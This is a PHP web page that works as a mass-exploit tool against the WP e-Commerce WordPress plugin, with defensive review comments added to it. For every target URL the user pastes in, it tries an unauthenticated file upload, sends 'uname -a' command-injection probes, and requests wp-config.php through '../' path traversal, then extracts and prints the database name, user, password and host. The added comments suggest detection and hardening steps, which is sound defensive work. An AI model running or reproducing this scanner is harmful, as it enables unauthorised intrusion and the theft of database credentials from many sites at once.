- <html>
- <title>WP E-COMMERCE</title>
- <body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>© </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br>
- <form method='POST'>
- <textarea name='sites' cols='45' rows='15'></textarea>
- <br>
- _______________________________________________________________
- <br><input style="background:dodgerblue;margin:0px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" value="EXECUTE" type="submit"><br><br><br>
- </form>
- <?php
// Review summary: for every base URL posted in the `sites` textarea, this script
// sends four HTTP requests to PHP files of the WP e-Commerce plugin and prints
// whatever comes back. The labels (AFU, RCE 1, RCE 2, LFI/LFD) and the file/line
// references are the paste author's claims; apart from the short quoted
// fragments no plugin code is on this page, so treat them as unverified.
// Log-side signals visible here: direct requests to PHP files inside the plugin
// directory, and the fixed User-Agent (reassembled from the wrapped lines)
// "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)".
// set_time_limit(0) removes the execution time limit; @ hides any warning.
- @set_time_limit(0);
// One target per CRLF-separated line of the POSTed textarea. The value is only
// trimmed, never validated, before being concatenated into request URLs.
- $sites = explode("\r\n", $_POST['sites']);
- foreach($sites as $target) {
- $target = trim($target);
// Request 1 (labelled AFU by the author): POST of a multipart field named
// `image` to save-data.functions.php. The note below points at a
// move_uploaded_file() call on $_FILES['image']; whether that code path lacks an
// authentication or file-type check is not shown on this page.
// Hardening to verify on the plugin side: the file refuses direct access, the
// handler requires an authenticated, nonce-checked admin request, and uploads
// are limited to an allowlist of image types stored under server-chosen names.
// Detection: POSTs to this path, the name lol.gif, or the literal marker string
// held in $uploadfile appearing in request bodies.
- /*AFU*/
- /*
- - file : save-data.functions.php
- - lines : 486.. 504
- line : 500
- move_uploaded_file( $_FILES['image']['tmp_name'], $new_image_path );
- */
- $headers = array("Content-Type: application/octet-stream",
- "Content-Disposition: form-data; name=\"image\"; file=\"lol.gif\"");
- $uploadfile="AZZATSSINS WAS HERE";
- $ch = curl_init($target."/wp-e-commerce/wpsc-admin/includes/save-
- data.functions.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
- NT 5.0)");
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('image'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
// Request 2 (labelled RCE 1): GET to ajax.php with wpsc_action taken from the
// URL. The fragment quoted below shows the value being turned into a function
// name with a fixed `_wpsc_ajax_` prefix and handed to call_user_func(); it
// shows no shell call, so the "RCE" label is not established by what is quoted.
// Safer pattern for such a dispatcher: look the action up in an explicit
// allowlist of registered handlers and reject everything else.
// Detection: wpsc_action values containing `+`, spaces or command-like words.
- /*RCE 1*/
- /*
- - file : ajax.php
- - lines : 38 , 41 , 57
- $callback = "_wpsc_ajax_{$ajax_action}";
- call_user_func $result = call_user_func($callback);
- $ajax_action = str_replace('-', '_', $_REQUEST['wpsc_action']);
- */
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $target."/wp-e-commerce/wpsc-admin/
- ajax.php?wpsc_action=uname+-a");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
- NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- $buf = curl_exec ($ch);
- curl_close($ch);
- unset($ch);
- echo $buf;
// Request 3 (labelled RCE 2): the same probe against display-sales-logs.php via
// the `c` parameter. Only the assignment `$controller = $_REQUEST['c']` is
// quoted; how $controller is used afterwards is not visible here.
// TODO confirm against the plugin source before relying on the label.
- /*RCE 2*/
- /*
- - file : display-sales-logs.php
- - line : 23
- $controller = $_REQUEST['c'];
- */
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $target."/wp-e-commerce/wpsc-admin/
- display-sales-logs.php?c=uname+-a");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
- NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- $buf = curl_exec ($ch);
- curl_close($ch);
- unset($ch);
- echo $buf;
// Request 4 (labelled LFI/LFD): image_name carries a `../` traversal aimed at
// wp-config.php through misc.functions.php. The author names five parameters as
// affected but quotes none of the plugin code.
// Mitigation: reduce the requested name with basename(), confirm via realpath()
// that the result stays inside the image directory, and make include files
// refuse direct access.
// Detection: `../` (raw or URL-encoded) in image_name, category_id,
// wpsc_request_image, productid or image_id.
- /*LFI/LFD*/
- /*
- - file: misc.functions.php
- - lines : 280 .. 355
- * multiple bug in function imagecreatefromgif() , you can use any param's to
- exploit it.
- * param's : [ image_name , category_id , wpsc_request_image , productid ,
- image_id ]
- */
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $target."/wp-e-commerce/wpsc-includes/
- misc.functions.php?image_name=../../../wp-config.php");
- curl_setopt($ch, CURLOPT_HTTPGET, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
- NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- $xp = curl_exec ($ch);
- curl_close($ch);
- unset($ch);
// If the response contains DB_USER it is treated as wp-config.php: the four
// database settings are extracted with regexes and printed. A site whose logs
// show a successful request of this shape should rotate the database password
// and the WordPress keys and salts stored in that file.
- if(preg_match("#DB_USER#i",$xp)){
- preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
- echo "DB_NAME:{$DB_NAME[1]}<br>";
- preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
- echo "DB_USER:{$DB_USER[1]}<br>";
- preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
- echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
- preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
- echo "DB_HOST:{$DB_HOST[1]}<br>";
- }
- }
- ?>